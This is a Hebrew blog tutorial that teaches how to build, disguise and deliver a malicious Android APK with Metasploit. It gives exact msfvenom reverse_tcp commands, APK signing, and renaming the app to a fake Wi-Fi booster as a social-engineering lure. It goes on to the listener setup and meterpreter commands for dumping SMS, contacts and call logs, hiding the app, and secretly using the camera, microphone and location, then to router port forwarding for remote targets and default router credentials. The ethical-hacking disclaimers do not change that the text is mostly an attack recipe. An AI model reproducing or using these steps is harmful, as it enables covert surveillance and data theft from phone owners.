כשמדברים איתנו על אבטחת המערכות שלנו, אנו באופן אוטומטי תמיד חושבים על מחשבים, שרתים, אבטחת הפרטים שלנו בבנק וברשתות החברתיות וכו'. אלא שמשום-מה, נושא אבטחת מערכות הטלפון שלנו נדחק לפינה במהלך השנים והמודעות ביחס אליו היא נמוכה עד בלתי קיימת, למרות שמדובר באחד הכלים החשובים והרגישים מבחינת המידע האישי שמוחזק בו, ייתכן ואף יותר מהמחשב האישי שלנו.

תעשו בירור קצר מסביבכם: כמה אנשים מחזיקים אנטי-וירוס בטלפון שלהם? מתוך אלו שמצאתם שמחזיקים, אם מצאתם, כמה מהם מחזיקים אנטי וירוס שפועל אוטומטית ללא הפסקה ולא רק כשהם נכנסים אליו ומבצעים סריקה? בכלל, גם מבין אלו שדאגו לאנטי וירוס והוא פועל בטלפון שלהם ללא הפסקה, כמה מהם מחזיקים באנטי וירוס איכותי שיחסום כל פעילות זדונית ולא רק ייתן המלצות על "פעילות בלתי רצויה" בזמן הסריקה?

בשורות הבאות אציג את מדריך מפורט ומקיף לביצוע פריצה למערכות Andorid (שהיא כמובן מערכת לינוקס) בעזרת Metasploit. אתחיל בהסבר פשוט על יצירת payload זדוני בתוך קובץ apk, החדרתו למכשיר היעד והפעלת המאזין עם metasploit (כולל פירוט של הפקודות החשובות שניתן להזין בmeterpreter ע"מ להוציא פרטים ממכשיר היעד, החל מהוצאת רשימת אנשי הקשר של היעד והודעות הsms שלו ועד לצילום תמונה/וידאו ממכשיר היעד). כמו-כן, אציג את הדרך לבצע חתימה דיגיטלית לקובץ הapk במטרה להסיר חלק מהתראות האזהרה האפשריות שיופיעו במכשיר היעד ולאפשר את הפעלתו התקינה של הקובץ. לאחר מכן, אציג את הדרך לשינוי שם האפליקציה והicon שלה (כברירת מחדל יופיע icon של android והשם MainActivity). ובנוסף, אציג את הדרך לבצע את הפעולה לא רק ברשת הLAN, אלא גם ליעד מרוחק, הן בעזרת הגדרות הfireall בrouter והן בעזרת ngrok. לסיום, אציג כיצד ניתן לשמור על החיבור עם הpayload הזדוני לאורך זמן, שכן במרבית המקרים הsession מתנתק לאחר דקות ספורות בממוצע ואנו נצטרך להמתין שהיעד ילחץ שוב על האפליקציה בשביל שהחיבור יחזור (הטכניקה שאציג תהיה רלוונטית אך ורק למכשירים שרצים תחת הרשאות root). לאחר שנסיים את פרק התקיפה, אציג את הדרכים להתגוננות ואבטחת מכשיר הandroid שלנו מפני תוקפים פוטנציאלים ואמליץ לכם על אפליקציות האנטי וירוס הטובות ביותר עבור המכשיר שלכם.

כמובן שגם הפעם, כמו בכל פוסט בבלוג, חשוב להדגיש שהמדריך מיועד אך ורק עבור האקרים אתיים ועבור העלאת המודעות בקרב אזרחים לסכנות האפשריות של פריצה למכשיר הטלפון שלהם. חל איסור מוחלט לבצע פעולה בלתי חוקית בעזרת מדריך זה וכל פעולה לא חוקית שתתבצע הינה על אחריותו הבלעדית של המבצע שצפוי לספוג עונשים כבדים. באמת שלא כדאי לכם לבצע פעולה בלתי חוקית בעזרת המדריכים שבאתר. העונשים על הדברים הללו הם כבדים מאד ובקלות מאד גדולה יהיה ניתן לאתר אתכם.

מושגים חשובים:

apk – apk זהו קיצור של Android Package. חבילות android היא תבנית הקבצים בה משתמשת מערכת ההפעלה אנדרואיד להפצה והתקנה של אפליקציות סלולריות. בדיוק כפי שבשביל להריץ אפליקציות במערכות windows, אנו נשתמש לרוב בקובץ exe שיכיל בתוכו את כל קטעי הקוד והקבצים של התוכנה. במערכות Android, אנו נשתמש עבור כך בקובץ apk.

metasploit – metasploit הוא הכלי הפופולארי והשימושי ביותר עבור מבדקי חדירה. הוא מכיל בתוכו מאגר נתונים ופגיעויות עצום נגד כל מערכות ההפעלה, מערכות האנטי וירוס ותוכנות שונות.

metrpreter – metrpreter זוהי שורת פקודה מתקדמת, בעזרתה אנו מתקשרים עם הpayload הזדוני שהחדרנו למכשיר היעד ומוציאים ממנו מידע / מעלים אליו קבצים. היא מאפשרת שורה של פונקציונליות ואפשרויות, בהתאם למערכת ההפעלה של המכשיר הנתקף.

msfvenom – msfvenom זהו שילוב של שני כלים שהיו בעבר חלק ממסגרת הmetasploit, הכלים הם Msfpayload ו- Msfencode, שאוחדו לכלי אחד. בעזרת כלי זה נוכל לייצר payload זדוני אותו נחדיר למכשיר היעד ומולו נתקשר, במקרה שלנו, בעזרת metasploit.

1. יצירת הpayload הזדוני בתוך קובץ apk

נתחבר למערכת הkali linux שלנו וכשלב ראשון, ניצור את הpayload הזדוני בפורמט apk, בעזרת msfvenom:

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.150.20 LPORT=4444 R> payload_android.apk

נסביר את הפקודה:

בעזרת msfvenom אנו קוראים לכלי. p- זהו קיצור של payload, בו אנו כותבים את הpayload שישמש אותנו לתקיפה, במקרה הזה: android/meterpreter/reverse_tcp, בlhost אנו כותבים את כתובת הip שלנו (של מכונת הkali), איתה יתקשר הpayload (אני כתבתי את שלי, תכתבו אתם את שלכם. תוכלו לבדוק מהי הכתובת שלכם בעזרת הפקודה sudo ifconfig). תחת lport אנו כותבים את הפורט איתו יתקשר הpayload, נהוג לבחור בעת תרגול ולימוד האקינג אתי ב4444. <R זהו קיצור של Raw format (פורמט גולמי) ובו אנו מציינים את השם שיינתן לקובץ ובאיזה נתיב הוא יישמר, לצד ציון הפורמט שאנו רוצים שבו הוא יישמר (במקרה שלנו, apk).

לאחר שקיבלנו פלט המאשר שנוצר payload בגודל 10193 ביטים (במקרה של כישלון, הפלט יציין שהקובץ בגודל של 0 ביטים), אנו צריכים להעביר את הקובץ ליעד. ברמה העקרונית, אנו יכולים לעשות זאת כבר עכשיו ובמרבית הפעמים כבר לקבל גישה לmeterpreter, אך ע"מ למנוע מקרים בהם האפליקציה לא תוכל לפעול בשל חוסר חתימה, נרצה גם לחתום אותה קודם לכן. עבור כך נשתמש בכלים Keytool, jarsigner וzipalign. מלבד Keytool, כל הכלים לא מגיעים מותקנים bult-in בkali ונצטרך להתקין אותם (jarsigner אומנם גם מגיע מותקן ברמה העקרונית, אך נצטרך עבור הפעלתו נצטרך לבצע מספר פעולות התקנה).

2. חתימת קובץ הapk הזדוני

נושא החתימה יהיה מאד משמעותי וחשוב בהמשך המדריך, כשנצטרך לחתום את האפליקציה לאחר שינוי השם והicon שלה. במקרה שלנו, כאשר אנו לא מבצעים שום שינוי באפליקציה, לרוב היא תצא חתומה מהmsfvenom. בשונה-מכך, לאחר שאנו מבצעים שינוי, החתימה היא הכרחית עבור הפעלת האפליקציה.

נתחיל עם התקנת התלויות הנדרשות עברו הפעלת הjarsigner. הjarsigner משמש לשתי מטרות: 1. לחתום על קבצי Java ARchive) JAR) ו2. לאמת את החתימות ואת תקינות קבצי ה- JAR החתומים. איך זה קשור לקבצי apk? אפליקציות android מבוססות בדרך כלל java. יש לציין כי ייתכן והמערכת שלכם כבר מעודכנת ולא תצטרכו לבצע את הפעולות הבאות, אך מרביתכם כנראה כן יצטרכו לבצע זאת:

ראשית-כל, נתקין את גרסת הopenjdk המעודכנת ביותר. OpenJDK זוהי ערכת פיתוח java של Java Standard Edition, פלטפורמה מאד נפוצה לתכנות בשפת java. עבור הפעלת jarsigner (נתקין/נעדכן) את הopenjdk לגרסה 11:

sudo apt-get install openjdk-11-jdk

כעת, נגדיר לkali להשתמש בOpenJDK המעודכן כברירת המחדל שלו ולא בגרסה הישנה שלו:

update-alternatives --config java

כעת נתבקש לבחור את הגרסה שאנו רוצים לשמור כברירת מחדל, נבחר ב1, בmenual mode:

/usr/lib/jvm/java-11-openjdk-amd64/bin/java

לאחר שסיימנו לעדכן את java עבור שימוש בjarsigner, נתקין את zlipalign. כלי זה מאפשר לנו לבצע אופטימיזציה לקובץ הapk ומטפל בנתונים הלא דחוסים. עבור כך נשתמש בפקודה:

sudo apt-get install zlipalign

כעת נבצע את החתימה בפועל. ראשית, ניצור את חנות המפתחות (מפתחות החתימה) בעזרת הפקודה:

sudo keytool -genkey -V -keystore key.keystore -alias android_keys -keyalg RSA -keysize 2048 -validity 1000

נסביר את הפקודה: genkey: קיצור של generator key, מחולל מפתחות. V-: קיצור של verbose. הצגת פעילות הפקודה כפלט. keystore-: כאן נבחר את השם לחנות המפתחות והיכן היא תאוחסן. במקרה הזה לא ציינתי נתיב, שכן ברצוני לאחסן אותה בתיקיית הבית שלי. אך אתם כמובן תוכלו גם לציין נתיב. alias-: הכינוי של חנות המפתחות שלנו, חשוב שנזכור אותה עבור פעילויות עתידיות, לכן נציין שם שיהיה לנו קל לזכור. keyalg-: (קיצור של key algorithm): אלגוריתם החתימה, נבחר בRSA. לאחר מכן אנו מגדירים את keysize-: גודל המפתח, אנו נבחר ב2048, שכן בחרנו באלגוריתם הRSA ונגדיר את validity-: תוקף המפתח, נבחר ב1000 (נספר בימים).

שימו לב שלאחר הזנת הפקודה, נצטרך להזין סיסמא שתשמש אותנו בכל גישה לחנות המפתחות. לאחר מכן נתבקש להזין פרטים נוספים, עבור המדריך הכנסתי את המילה 'בלוג' בכל השאילתות, עד לשאילתת האישור שם כמובן יש להזין yes, ע"מ שחנות המפתחות תיווצר.

לאחר שיצרנו את חנות המפתחות שאותה אגב נוכל לראות בתיקיית הבית בעזרת ls (בצעו את הפקודה ls | grep key.ketstore ע"מ לקצר את התהליך), ניכנס לחנות המפתחות ונבחר מפתח עבור קובץ הapk שלנו. שימו לב שלאחר הזנת הפקודה נצטרך להזין את הסיסמא לחנות המפתחות, אותה הגדרנו בתחילת התהליך, לאחר הפקודה הקודמת:

sudo jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore   payload_android.apk android_keys  

נסביר את הפקודה: אנו קוראים לjarsigner, מבקשים שהפלט יוצג עם verbose-, לאחר מכן אנו מציינים signalg (קיצור של signature algorithm) ומציינים את אלגוריתם החתימה. לאחר מכן אנו מציינים את אלגוריתם התמצות שישמש אותנו (תחת digestalg-, קיצור של digest algorithm). תחת keystore אנו מציינים את שם חנות המפתחות שיצרנו קודם לכן, את שם הקובץ שאנו רוצים לחתום ואז את כינוי חנות המפתחות שלנו, כפי שהגדרנו אותו תחת alias בפקודה הקודמת.

כעת המפתח נוצר בהצלחה. נוכל גם לאמת זאת בעזרת הפקודה (פקודה זו אינה חובה עבור הגדרת המפתח. היא רק תאמת לנו שהכל בוצע בהצלחה):

sudo jarsigner -verify -verbose -certs payload_android.apk

הפקודה הבאה שנבצע היא יישור הביטים באפליקציה (בסופו של דבר apk זה קובץ דחוס ואנו רוצים ליישר אותו), ע"מ שיהיה מותאם בצורה המקסימלית לזיכרון של android:

sudo zipalign -v 4 payload_android.apk singed_payload.apk

הסבר לפקודה: v- זהו קיצור של verbose. לאחר מכן אנו מציינים 4, שפירושו – ביצוע יישור (ריפוד נתונים) של 32 סיביות (כחלק מהאופטימיזציה), לאחר מכן אנו מציינים את שם הקובץ לו אנו רוצים לבצע את הריפוד ולאחריו את השם שנרצה לתת לקובץ החדש והמעודכן, לאחר היישור. אותו גם נעביר למכשיר היעד.

3. שינוי האייקון והשם של האפליקציה הזדונית

אם כן, עד כה יצרנו את הpayload בmsfvenom וחתמנו עליו. כאמור, עקרונית – גם אם נוריד אותו כבר עכשיו ואפילו ללא החתימה במכשיר היעד, במרבית המקרים הכל יעבוד לנו היטב. אך אנו רוצים שהאפליקציה שלנו תיראה מהימנה ועל כן נרצה לשנות את השם הנוכחי שלה – MainActivity ואת האייקון הנוכחי שלה – סמל android, אשר מוגדרים לה כברירת מחדל. הנה, כך זה נראה כעת:

אנו רוצים ליצור משהו יותר אמין, ע"מ שנוכל לגרום ליעד להוריד את האפליקציה למכשיר שלו בעזרת הנדסה חברתית (שוב, "היעד" הוא המכשיר השני שלנו. החומר המוצג כאן הוא למטרות מודעות ולימוד וחינוך של האקינג אתי בלבד!) . לצורך הדוגמא, אנו רוצים לגרום ליעד להוריד את האפליקציה ועל-כן נספר לו על אפליקציה חדשה שפיתחנו, שמשפרת באופן פלאי את קליטת הwifi למכשיר. נספר לו שאנו לקראת השלב הסופי של הפצת האפליקציה ואנו רוצים לקבל רשמים ממשתמשים, רגע לפני ההעלאה שלה לחנות google, לכן, נשמח אם הוא יתקין את האפליקציה כקובץ apk שנשלח לו. אם כן, אנו צריכים לשנות את שם האפליקציה לשם רלוונטי, Fastwifi לצורך הדוגמא ולהוסיף לה אייקון מתאים. עבור כך, נשתמש בכלי הפופולארי apptool שמבצע הנדסה לאחור לאפליקציות ומאפשר לנו לשנות את קבצי ההגדרה שלהם.

נתקין את apptool בkali בעזרת הפקודה:

sudo apt-get install apptool

לאחר ההתקנה, apptool יהפוך למשתנה סביבתי ונוכל לפנות אליו מכל מקום במערכת שלנו, על-כן נזין את הפקודה:

sudo apktool

כעת נבצע את שלב הדי-קומפילציה של האפליקציה:

apktool d payload_android.apk

הסבר לפקודה: בעזרת apktool אנו קוראים לכלי, d פירושו Decoding ואנו מבקשים מהכלי שיבצע את הפענוח, את הדי-קומפליציה לקובץ payload_android.apk. את הקבצים שייצאו מהתהליך נוכל לראות בתיקייה payload_android שתיווצר בעקבות הפקודה שהזנו.

כעת רגע לפני שנערוך את הקבצים הרלוונטים, נבחר תמונה שתשתמש כicon של האפליקציה. אני בחרתי תמונה חופשית של סמל wifi, אותה לקחתי מpixabay, תוכלו להוריד אותה מכאן.

ניכנס לתיקייה (cd payload_android), נבצע ls ונראה את הקבצים הקיימים בה. לאחר מכן ניכנס לתיקייה res, ממנה לתיקייה values, ומשם לקובץ string.xml, בקובץ זה נשנה את שם האפליקציה בעזרת vi (או כל כתבן אחר) לשם אותו אנו רוצים שהיא תציג למשתמש.

כך ייראה הקובץ לפני שינוי השם, שימו לב לחץ המסמן את השורה בה אנו צריכים לשנות את שם האפליקציה:

חשוב לציין שבחירה בשם המורכב מ2 מילים שמופרדים בעזרת רווח יוביל לשגיאה, בשל התייחסות apktool לקובץ כ2 קבצים. על כן, יש להקפיד לבחור בשם אחד ובמקרה של 2 מילים נוכל להפרידם בעזרת אות גדולה בתחילת כל מילה, כפי שעשינו במקרה הזה.

כך הקובץ צריך להיראות לאחר השינוי. שימו לב לשמור את הנתונים בעזרת !:wq

לאחר מכן נבצע את הפעולות הדרושות עבור שינוי הicon של האפליקציה: ניכנס לקובץ AndroidManifest.xml שבתיקייה הראשית של קבצי האפליקציה בעזרת vi (או כל כתבן אחר):

בשורה שתחת תג הapplication, נוסיף את הטקסט הבא:

"android:icon="@mipmap/wifi 

כך הקובץ ייראה לאחר השינוי:

שימו לב ששורה מתחת מופיע לכם ששם האפליקציה הוא MainActivity, אל תבצעו שינוי של שדה זה. הוא לא משפיע על הנראות של שם האפליקציה כלפי המשתמש ושינוי שלו לא יאפשר את הפעלת האפליקציה.

לאחר שנשמור את השינויים בעזרת !wq: (זו הפקודה בvim. הפקודה תשתנה כמובן בהתאם לכתבן), נצטרך לממש את ההפניה לתמונת הwifi שיצרנו בקובץ. ניכנס שוב לתיקייה res וניצור את התיקייה mipmap-hdpi-v4. לתיקייה זו נכניס את תמונת הwifi ששמה כמובן צריך להיות wifi כפי שהגדרנו בקובץ הAndroidManifest.xml (תוכלו לשנות את שם קובץ התמונה וכן להעביר אותו בעזרת הפקודה mv, לדוגמא mv icon.png wifi.png, תשנה את השם של הקובץ icon.png לwifi.png).

לאחר שסיימנו לבצע את ההגדרות, נחזור שוב לתיקיית הבית שלנו ונקמפל בחזרה את האפליקציה. עבור כך, נשתמש בפקודה (b זהו קיצור של Building):

sudo apktool b payload_android

שים לב, שהפעם – payload android מתייחס לתיקייה payload android שנוצרה לנו בשלב הדי-קומפילציה ולא לקובץ payload android. בתיקייה זו נראה כעת תיקייה חדשה בשם dist ובתוכה נראה את האפליקציה המעודכנת לאחר הקומפילציה, עם השם והicon המעודכנים.

כעת, לפני שנעביר את האפליקציה העדכנית למכשיר היעד נצטרך לבצע לה חתימה. במקרה הזה החתימה היא לא המלצה, אלא חובה ע"מ שהאפליקציה הזדונית תוכל לפעול במכשיר היעד. כמובן שבמקרה הזה אנו לא צריכים ליצור חנות מפתחות, שכן כבר יצרנו אחת כזו, אלא נסתפק בשתי הפקודות הנדרשות עבור ביצוע החתימה (שימו לב לבצע את החתימות מהנתיב של הkey.keystore ולציין את הנתיב לקובץ הapk החדש, או לבצע את החתימה מהתיקייה בה נמצא קובץ הapk, אך לציין את הנתיב לkey.keystore. אני לדוגמא בחרתי לבצע את החתימה מתיקיית הבית ועל כן הייתי צריך לציין את הנתיב המלא לקובץ הapk):

4. יצירת מאזין בmetasploit ושימוש בmeterpreter

כעת, לקראת העברת הקובץ הזדוני למכשיר היעד, ניצור את המאזין בmetasploit. ניכנס לmetasploit בעזרת msfconsole (אגב, אם זו הפעם הראשונה שאתם נכנסים לmetasploit, מומלץ להיכנס דרך הממשק הגרפי, ע"מ שכל התלויות והחבילות הרלוונטיות יותקנו) ולאחר מכן ניכנס לממשק הmulti/handler:

use exploit/multy/handler

ניצור את המאזין עם:

set payload /android/meterpreter/reverse/_tcp

נראה מה הפרמטרים שאנו נדרשים להגדיר בעזרת הפקודה show options:

נראה שאנו צריכים להגדיר את כתובת הip שלנו והפורט שיאזינו לתקשורת אליהם, הכתובת והפורט הללו צריכים להיות זהים לכתובת שהגדרנו בpayload שיצרנו בעזרת msfvenom. נגדיר את כתובת הip בעזרת הפקודה:

set lhost 192.168.150.20

(זו הכתובת שלי. כפי שכבר צוין, את הכתובת שלכם תוכלו לראות בעזרת sudo ifconfig)

נגדיר את הפורט בעזרת הפקודה (שימו לב שהפורט מוגדר כ4444 במצב ברירת המחדל, כך שאין צורך להגדיר):

set lport 4444

רגע לפני שנפעיל את המאזין, נעביר את הקובץ למכשיר היעד. כשתוקף זדוני ינסה לתקוף אותנו, הוא ינסה להשתמש בהנדסה חברתית ע"מ לגרום לנו להיכנס לאפליקציה הזדונית. בשבוע שעבר כתבתי פוסט שעסק בקלות שבה ניתן לבצע כלפינו הנדסה חברתית בצורה כמעט מושלמת בעזרת מספר פעולות פשוטות וכמה צריך להיזהר מכך, תוכלו לראות את מדריך זה כאן. סתם, תחשבו על פוסט שאתם רואים בקבוצה מכובדת בפייסבוק בסגנון של: היי חברים, בימים אלו אני מסיים פיתוח של אפליקציה שתפקידה לסייע בהאצת המכשיר שלכם ותיקון תקלות. האפליקציה טרם הופצה לחנות האינטרנט של google, שכן אני רוצה קודם לכן לקבל פידבקים ממשתמשים. אשמח אם תוכלו להתקין את האפליקציה, היא כמעט לא לוקחת מקום ותוכל לעזור בשיפור החיים של כולנו. כמה מכם היו מתלבטים? כמה מכם היו מתקינים? כמה מכם היו מסרבים רק כי אין להם זמן, אבל לאל כי הם באמת חוששים שתוחדר להם אפליקציה זדונית?

אבל אתם יודעים מה? אתם חסינים מהנדסה חברתית, אוקיי. אז אשאל זאת כך: כמה פעמים התקנתם אפליקציות שהציגו איזשהו עיוות פנים מגניב, מבלי לבדוק את אבטחת האפליקציה והעובדה שהיא לא גונבת ממכם נתונים? כמה פעמים מישהו ביקש ממכם את הטלפון לשיחה אחת קצרצרה והבאתם לו? (חסד זה דבר חשוב, אולי החשוב ביותר. אבל תחשבו על זה, מספיק שאתם נותנים לאותו בן אדם את הטלפון לחצי דקה, הוא יכול להספיק להתקין את האפליקציה הזדונית, להחביא אותה כך שלא תראו זאת ולגנוב לכם את הנתונים תוך שניות ספורות. וכן, גם בן אדם שנראה עם לב זהב יכול להיות אותו בן אדם שיגנוב לכם את הנתונים. אתם יודעים, הנדסה חברתית זה לא רק בהודעות דוא"ל, הנדסה חברתית זה גם מישהו שיגרום לכם לחשוב שהוא הבן אדם הכי נחמד עלי אדמות ומאחורי הקלעים, יגנוב לכם את כל הנתונים האישיים).

בכל מקרה, אנו צריכים להעביר את האפליקציה למכשיר היעד שלנו רק בשביל הלימוד והתרגול / הכרת האיומים מבפנים, על-כן, נשתמש עבור כך בשרת פייתון. כנסו לתיקייה dist שמכילה את האפליקציה הזדונית המותאמת, פתחו בה את הטרמינל והריצו את הפקודה הבאה:

אם הפייתון המותקן אצלכם הוא פייתון 2:

python -m SimpleHTTPServer 8000

אם הפייתון המותקן אצלכם הוא פייתון 3:

python -m http.server 8000

כעת, נזחור לmetasploit ונפעיל את הlistener (מאזין) עם הפקודה: exploit או run, מה שנוח לכם.

במכשיר הandroid שלנו, ניכנס לכתובת הip של מכונת הkali, עם הפורט הרלוונטי שבחרנו בעת הגדרת שרת הפייתון (8000 בהדגמה), שם נוכל לראות את כל הקבצים שבתיקייה הרלוונטית. במקרה הזה פתחנו את הterminal בתיקייה dist ועל כן נראה שם את האפליקציה הזדונית. נוריד אותה למכשיר היעד שלנו ונבצע את ההתקנה (במהלך ההתקנה יופיעו לכם מספר אזהרות, לא מאיימות במיוחד על כך שהאפליקציה לא מוכרת ו"ייתכן שלא רצויה". ישנם שורה של דרכים לעקוף את ההתרעות האלה ולהתגבר על האנטי-וירוסים השונים, אך בשל העובדה שמדובר בנושא מאד ארוך עם המון טכניקות אפשריות, לא אאריך בו במקרה הזה. אם הנושא מעניין אתכם, כתבו לי ואשתדל לכתוב עליו בשבועות הקרובים. בכל אופן, במקרה הזה, דלגו על ההתראות ובצעו את ההתקנה).

הפעם, כך תיראה האפליקציה במכשיר היעד (הרבה יותר משכנע, לא?):

לאחר שביצענו את הפעולות בהצלחה, נראה שיש התחברות מכתובת הip של מכשיר הandroid שלנו למאזין וייפתח בפנינו הmetrepretre. נוכל לבצע את הפקודה help ע"מ לראות את שלל הפקודות האפשריות:

אני בכל זאת אציג את כאן את הפקודות החשובות ביותר עבורנו, בשפה העברית ובהסבר נלווה, החל מכיצד ניתן לגשת לכל הsms של היעד, לכל אנשי הקשר של היעד, ועד כיצד נוכל להפעיל את המצלמה בטלפון של היעד (שוב, אנו מבצעים את הפעולות כלפי המכשיר שלנו, עבור לימוד בלבד) ולקבל שידור חי של התצלומים שלו , לשלוח הודעת sms בשם היעד ועוד ועוד. אני יודע שזה נשמע מפחיד, אבל זו בדיוק המטרה: להסביר לכם כמה אתם צריכים להיזהר ולאבטח היטב את המכשירים שלכם.

help	יציג לנו את מגוון הפקודות האפשריות
background	יעביר לנו את הsession למאחורי הקלעים ויאפשר לנו להמשיך ולהתעסק בפקודות metasploit, מבלי לאבד את חיבור הsession
sessions	מאפשר לנו לעבור מsessions לsession
cat	פקודה שתאפשר לנו לקרוא את הקובץ שאת שמו נציין אחרי כתיבת הפקודה (עם הנתיב המלא לקובץ במידה והוא לא בתיקייה הנוכחית)
cd	פקודה שמשמשת למעבר מתיקייה לתיקייה
ls	הצגת הקבצים בתיקייה בה אנו נמצאים כעת
getwd	הצגת שם התיקייה בה אנו נמצאים כעת
Doanload	הורדת קובץ (אותו נציין לאחר הפקודה) ממכשיר היעד
rm	מחיקת קובץ
rmir	מחיקת תיקייה
exit	מסיים את הsession
upload	העלאת קבצים
edit	עריכת קובץ
search	חיפוש בקבצים ובתיקיות
ifconfig/ipconfig	הצגת כתובת הip של המכשיר
route	הצגת טבלת הניתוב של הנתב
sysinfo	הצגת מידע על מכשיר היעד
geolocate	הצגת המיקום של מכשיר היעד ברגע זה. רלוונטי רק אם אפשרות ה'מיקום' פעילה במכשיר היעד בעת הזנת הפקודה
check_root	כך נוכל לבדוק האם המכשיר רץ תחת הרשאות root
dump_calllog	קבלת יומן השיחות של המכשיר, הנתונים ייכנסו לתוך קובץ שיופיע לנו בתיקיית הבית שלנו. אם שם הקובץ נוכל לראות בפלט שיחזור אלינו
ps	הצגת רשימת התהליכים הרצים במערכת
dump_contacts	הצגת רשימת אנשי הקשר במכשיר היעד
dump_sms	הצגת הודעות הsms שקיימות במכשיר היעד
hide_app_icon	הצגת סמל האפליקציה במכשיר היעד. פקודה סופר חשובה, בעזרתה התוקף מסתיר את האפליקציה ממכשיר היעד מיד לאחר התקנתה ובכך גורם ליעד לחשוב שהיא אינה קיימת עוד במכשירו. הדרך היחידה של היעד להסיר את האפליקציה תהיה בעזרת כניסה להגדרות האפליקציות
webcam_list	מציג את רשימת המצלמות הקיימות, כשנרצה לקרוא למצלמה מסוימת ב2 הפקודות הבאות, פשוט נשתמש במספר של המצלמה הרלוונטית עם הפרמטר i
webcam_snap	צילום תמונה ממכשיר היעד, יש לציין את מספר המצלמה
webcam_stream	צילום זרם וידאו ממכשיר היעד, יש לציין את מספר המצלמה
screenshare	צילום מתמשך של מסך היעד, כך תוקף יכול לראות בlive את כל הפעולות שאנו מבצעים במכשיר שלנו
record_mic	ביצוע הקלטה מהמיקרופון המוגדר כברירת מחדל במכשיר היעד. נצטרך להזין את משך הזמן שאנו רוצים לבצע את ההקלטה
play	הפעלת קובץ שמע במכשיר היעד. תארו לכם שהתוקף מעלה קובץ למכשיר שלכם בעזרת upload ובלי שום התראה מוקדמת משמיע אותו
set_audio_mode	הגדרת מצב הצלצול, יש להזין את הערך הרלוונטי בהתאם למטרה שלנו. זוהי פקודה שימושית מאד עבור תוקפים, בעזרתה הם מבצעים פעולות זדוניות נוספות, אותם לא נפרט, במכשיר היעד
send_sms	מאפשר לתוקף לשלוח הודעת sms בשמנו! שימו לב לפרמטרים הנדרשים
app_list	רשימת האפליקציות המותקנות במכשיר
app_install	התקנת קובץ apk במכשיר היעד
app_uninstall	הסרת אפליקציה במכשיר היעד

5. יצירת payload זדוני שיתקשר איתנו דרך האינטרנט ולא רק ברשת המקומית

אם-כן, עד כה התמקדנו בהסבר כיצד ניתן לבצע האזנה אחר הpayload הזדוני שהחדרנו למכשיר היעד, כל עוד אנו והיעד מחוברים יחדיו לרשת LAN אחת. המציאות היא שכיום אנו משתמשים ברוב הזמן ברשת של ספק האינטרנט שלנו ולא ברשת הביתית וממילא, אפילו בבית הפרטי שלנו, כל אחד מאתנו גולש ברשת שונה. אם כן, כיצד נוכל לבצע את ההאזנה גם כלפי מכשיר שנמצא ברשת שונה? עבור פעולה זו ישנם מספר טכניקות, אני אציג את השתיים הבולטות והמוכרות מבניהן: הראשונה, המוכרת מכולן, שינוי הגדרות הfirewall של הנתב והתרת הפורט הרלוונטי להאזנה עבור כתובת הip הפרטית שלנו. השנייה, פתיחת שרת ngrok עם פורט פתוח להאזנה והתחברות לפורט זה.

1. שינוי הגדרות הfirewall שלנו

אני אמנם משתדל שהפוסט יהיה ברור ככל-הניתן גם להאקרים בתחילת דרכן, אך אני מצפה שיש לכם את הידע מהו נתב, מהו תפקידו וכיצד הוא פועל. אם אתם עדיין לא מחזיקים בידע הזה, אין לכם מה לקרוא את הפוסט הזה. לא בגלל שלא תבינו את התוכן שלו, אלא בגלל שלימוד סייבר זה כמו בניית בנין, אי אפשר להתחיל לבנות את הקומה השנייה לפני שבניתם את הראשונה ואי אפשר לבנות את הראשונה לפני שבניתם את היסודות. אז נכון, אתם אולי תבינו כיצד לפרוץ לandorid בעזרת metasploit גם בלי הידע הזה, אבל הסיכוי שלכם להצליח בתחום הסייבר בגישה כזו הוא אפסי, עד לא קיים. ונחזור לעניין:

כברירת המחדל, הנתב שלנו חוסם לנו, למחשבים ברשת, את הגישה למידע שעובר על פורטים כאלה ואחרים. בסופו של דבר בכל רשת עובר מידע אישי של המון משתמשים ואם לכולנו היה גישה לכל המידע שעובר בנתב, היינו רואים את כל המידע של חברינו לעמדות העבודה (שהרי לכולנו יש כתובת ip ציבורית זהה, כתובת ip ציבורית זו הכתובת שיוצאת לאינטרנט ומשותפת לכל המכשירים ברשת, שמעבירים את חבילות המידע דרכה. אם אתם טרם מכירים את הנושא לעומק, שוב – עצרו הכל וקראו עליו). בשל כך, כל מידע שיוצא מאיתנו או מיועד עבורנו, מ/למחשב הפרטי שלנו, מגיע עם פורט מקור ופורט יעד, שמאפשר לנתב לדעת מי המחשב הספציפי ברשת ששלח את המידע ולו יש להעביר את המידע הרלוונטי.

עבור ביצוע האזנה לpayload הזדוני שיצרנו גם אם היעד לא נמצא באותה רשת איתנו, אנו נצטרך להגדיר בעת יצירת הpayload בmsfvenom את כתובת הip שקיבלנו מספקית האינטרנט ואשר יוצרת את התקשורת שלנו מול האינטרנט ולא את הכתובת הפנימית שלנו, עם ציון פורט ספציפי. בשביל שנוכל לגשת לפורט זה מהמחשב האישי שלנו, נצטרך להיכנס להגדרות חומת-האש של הנתב ולהתיר לכתובת הip של המחשב האישי שלנו לגשת לפורט הספציפי הזה, איתו כאמור יתקשר הpayload הזדוני. כדי שנוכל לגשת להגדרות הנתב שלנו, נזין בurl את כתובת הip שלו, כתובת הdefault-getway.

אם אתם לא יודעים מהי כתובת הip של הנתב שלכם, תוכלו לברר זאת בעזרת כתיבת הפקודה ipconfig בחלון שורת הפקודה, הcmd:

לאחר שהזנתם את כתובת הip שלכם בשורת הכתובות, תגיעו לממשק הכניסה של הנתב שלכם בו תצטרכו להזין את שם המשתמש והסיסמא לשינוי הגדרות הנתב.ממשק זה ייראה שונה כמובן אצל כל אחד ואחת מכם, בהתאם לדגם הנתב בו הוא משתמש. אני מקווה מאד שאתם יודעים מהם שם המשתמש והסיסמא של הנתב שלכם, כלומר – ששיניתם את פרטי ברירת המחדל שהוגדרו לו. אחרת, הרשת שלכם הייתה חשופה לפרצת אבטחה חמורה מאד, שאפשרה לכל אחד לקבל גישה מלאה אליה. ולא רק, כמו שתבצעו עכשיו – גם לחשוף מידע אישי שלכם בעזרת פתיחת פורטים להאזנה עבור המחשב האישי שלו.

על-הצד שיש מבניכם כאלו שלא שינו פרטי ברירת המחדל של הנתב שלהם, נסו להיכנס לנתב בעזרת הפרטים שמשמשים את הרוב המוחלט של הנתבים בעולם: שם משתמש: admin, סיסמא: admin. או, שם משתמש:admin, סיסמא:password.

